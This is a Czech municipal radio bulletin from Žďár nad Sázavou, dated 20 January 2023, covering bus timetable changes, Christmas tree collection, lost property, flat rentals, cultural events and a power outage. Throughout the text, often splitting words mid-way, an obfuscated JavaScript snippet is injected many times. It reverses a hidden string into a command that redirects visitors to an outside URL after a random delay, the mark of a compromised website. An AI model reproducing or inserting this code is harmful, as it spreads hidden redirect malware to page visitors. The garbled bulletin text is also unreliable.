Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 20. ledna 2023

Pátek, 20. ledna 2023

Vážení občané,

 

Z ÚŘADU:

Odbor komunálních služeb oznamuje, že byly schváleny jízdní řády MHD pro rok 2023.

Rozsah zůstává téměř shodný s rokem 2022, úpravy se provedly na základě relevantních připomínek občanů po předchozím projednání a schválení. Nové jízdní řády jsou dostupné na webech města a dopravce a v celostátním informačním systému. Změny v MHD od 1. 1. 2023:

Linka č. 5 – je přidán spoj v pracovní dny s odjezdem v 17.15 hod. z au$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusového nádraží

Linka č. 6 – je přidán pár spojů pro zlepšení spojení ZR 3 – náměstí – Vodojem s odjezdem z au$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusového nádraží v 11.10 hod., zpět bude spoj vyjíždět z Vodojemu v 11.30hod.

Linka č. 7 – spoj č. 8 je uspíšen o 5 minut (odjezd ze zastávky Tokoz v 7.25), důvodem je zlepšení docházky do škol ve ZR 3

Městský úřad, odbor komunálních služeb oznamuje, že do 31. března 2023 dochází ke změně provozní doby sběrného dvora na Jihlavské ulici. Více informací naleznete na webu města. 

Odbor komunálních služeb upozorňuje občany, že svoz vánočních stromků odložených u kontejnerů na separovaný odpad bude probíhat dle následujícího rozpisu: 

• 20-23.1 ZR 5

• 24-25.1 ZR 7

• 26-27.1 ZR 2 a ZR 8

• 30-31.1 místní části (Stržanov, Veselíčko, Radonín, Mělkovice) 

V jiných termínech je nutné, aby si občané likvidaci a odvoz stromků např. na sběrný dvůr na Jihlavské ulici zajistili sami na své náklady. Děkujeme Vám všem za spolupráci při snaze udržet naše měs$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to čisté. 

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány svazek klíčů, klíč od vozu a sluchátka. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

VYHLÁŠENÉ ZÁMĚRY MĚSTA: 

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou vyhlašuje záměr na pronájem bytu na ulici Revoluční, č. o. 27, č. p. 1829. Jedná se o byt č. 29. Základní měsíční nájemné činí 1 755,- Kč. Byt bude k dispozici od 1. května 2023. Uzávěrka záměru je 26. ledna 2023 ve 12:00 hodin. 

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou vyhlašuje záměr na pronájem bytu na ulici Brodská, č. o. 35, č. p. 1936. Jedná se o byt č. 35. Základní měsíční nájemné činí 1 755,- Kč. Byt bude k dispozici od 1. května 2023. Uzávěrka záměru je 2. února 2023 ve 12:00 hodin.  

 

KULTURNÍ POZVÁNKY:

Knihovna Matěje Josefa Sychry Vás zve na výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií „10 let Fo$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toklubu Freeland“, která je umístěna v Galerii u Sychry a v Čechově domě do konce února 2023. 

Senior point knihovna pořádá každé úterý od 9:00 hodin koordinační cvičení pro seniory s lek$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torkou Romanou Sochovou. Cvičení probíhá v přednáškovém sále knihovny. 

V Knihovně Matěje Josefa Sychry probíhá do konce ledna 2023 akce s názvem „Odlož mobil v knihovně“. Máte nefunkční mobil? Zapojte se do soutěže. Stačí vyplnit formulář, připevnit ho na vyřazený mobil a vhodit v oddělení pro dospělé čtenáře do označeného sběrného boxu. Telefony budou odborně rozebrány a recyklovány. Pomozte nám zvýšit povědomí o třídění vysloužilého elektrozařízení! Ten$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to projekt vznikl ve spolupráci neziskové organizace ASEKOL a Kraje Vysočina.

V Regionálním muzeu na Tvrzi bude probíhat od 31. ledna do 24. dubna výstava Retrohrátky. K vidění budou hračky éry socialismu a také interaktivní dětská herna. Uvidíte například Rubikovu kostku, plechovou berušku na klíček nebo céčka a některé věci si budete moct i vyzkoušet. Více informací najdete na webu muzea www.muzeumzdar.cz nebo na Facebooku.

OSTATNÍ:

EG.D. a. s. oznamuje, že z důvodu prací na zařízení distribuční soustavy bude přerušena dodávka elektrické energie a $NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to dne 8. února 2023 v době od 7:30 do 12:30 hodin a $NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na ulici Lučiny a ul. Jamská č. 2231/4 (Hasičský záchranný sbor).